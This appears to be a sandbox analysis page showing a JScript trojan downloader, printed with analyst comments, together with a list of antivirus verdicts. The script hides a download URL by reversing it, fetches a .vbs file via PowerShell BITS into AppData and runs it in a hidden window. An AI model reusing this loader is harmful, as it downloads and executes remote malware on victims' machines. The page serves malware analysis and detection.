Static | ZeroBOX
No static analysis available.
// Analyst notes: this is JScript (it relies on ActiveXObject), not C#. It is a
// downloader stage: it assembles a PowerShell command line as a string and hands
// it to powershell.exe through Shell.Application with a hidden window.
// Detection pointers taken from the lines below:
//   - powershell.exe started with "-command" by the process hosting this script
//     (the host itself, e.g. wscript.exe/cscript.exe, is not shown on this page);
//   - Start-BitsTransfer with an http:// source writing a .vbs into the
//     ApplicationData folder;
//   - the string-reversal idiom ($x[-1..-$x.Length] -join '') used to hide the URL.
var HvKPr = "todo.vbs"; // name of the file that will be executed, e.g. teste.exe
var AfiMff0uIMMMUhQUQVF
// PowerShell: $QS0W0FFBPFAH = the current user's ApplicationData folder path.
AfiMff0uIMMMUhQUQVF = "$QS0W0FFBPFAH = [Environment]::GetFolderPath('ApplicationData') ;" ;
// PowerShell: $CCUahMFMHNFS holds the download URL written backwards so the literal
// URL never appears in the file. Reversed (defanged IoC): hxxp://188.126.90[.]5/envifa.vbs
AfiMff0uIMMMUhQUQVF = AfiMff0uIMMMUhQUQVF + "$CCUahMFMHNFS = \'sbv.afivne/5.09.621.881//:ptth' ;" ;
// PowerShell: un-reverses the URL and downloads it over BITS to
// <ApplicationData>\update.vbs.
AfiMff0uIMMMUhQUQVF = AfiMff0uIMMMUhQUQVF + "Start-BitsTransfer -Source ($CCUahMFMHNFS[-1..-$CCUahMFMHNFS.Length] -join \'\') -Destination ($QS0W0FFBPFAH + \'\\' + \'update.vbs\') ;" ;
// PowerShell: Rename-Item on <ApplicationData>\todo.vbs (HvKPr). NOTE(review): the
// -NewName variable $VBIoaMMFAhCAQ is never assigned in the visible script and the
// downloaded file is named update.vbs, not todo.vbs, so this looks like an unused
// leftover from a template; it does not change the download/execute path below.
AfiMff0uIMMMUhQUQVF = AfiMff0uIMMMUhQUQVF + "Rename-Item -Path ($QS0W0FFBPFAH + " + "\'\\" + HvKPr + "\')" + " -NewName $VBIoaMMFAhCAQ;" ;
//execute file
// PowerShell: starts <ApplicationData>\update.vbs via Process.Start; presumably it
// runs under the default .vbs handler (normally Windows Script Host) - confirm in
// the behavioural part of the sandbox report.
AfiMff0uIMMMUhQUQVF = AfiMff0uIMMMUhQUQVF + "[System.Diagnostics.Process]::Start($QS0W0FFBPFAH + \'\\' + \'update.vbs\') ;" ;
// Shell.Application COM object; its ShellExecute launches the assembled command.
var oShell = new ActiveXObject("Shell.Application");
// Last argument 0 = hidden window, so no PowerShell console is shown to the user.
// The whole script is passed in clear text after "-command", which makes it visible
// to process-creation command-line logging and PowerShell script-block logging.
oShell.ShellExecute("powershell.exe", " -command " + AfiMff0uIMMMUhQUQVF , "", "open" , 0);
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.SAgent.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Trojan.JS.Agent.GVD
Symantec ISB.Downloader!gen81
ESET-NOD32 JS/TrojanDownloader.Agent.ZJA
TrendMicro-HouseCall Trojan.JS.REMCOS.YXEFEZ
Avast JS:Generic-AE [Drp]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.Script.SAgent.gen
BitDefender Clean
NANO-Antivirus Trojan.Script.Heuristic-js.iacgm
ViRobot Clean
MicroWorld-eScan Clean
Tencent Js.Trojan-Downloader.Er.Mcnw
Sophos Clean
F-Secure Malware.JS/TrjDldr.MAD
DrWeb Clean
VIPRE Clean
TrendMicro Trojan.JS.REMCOS.YXEFEZ
FireEye Clean
Emsisoft Clean
GData Script.Trojan.Agent.6J9XNQ
Jiangmin Clean
Varist Clean
Avira JS/TrjDldr.MAD
MAX Clean
Antiy-AVL Clean
Kingsoft Script.Trojan.SAgent.gen
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Script.SAgent.gen
Microsoft Trojan:JS/Remcos.RVC!MTB
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Trojan-Downloader.JS.Agent
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG JS:Generic-AE [Drp]
Panda Clean
alibabacloud Trojan[downloader]:Javascript/SAgent.gyf
No IRMA results available.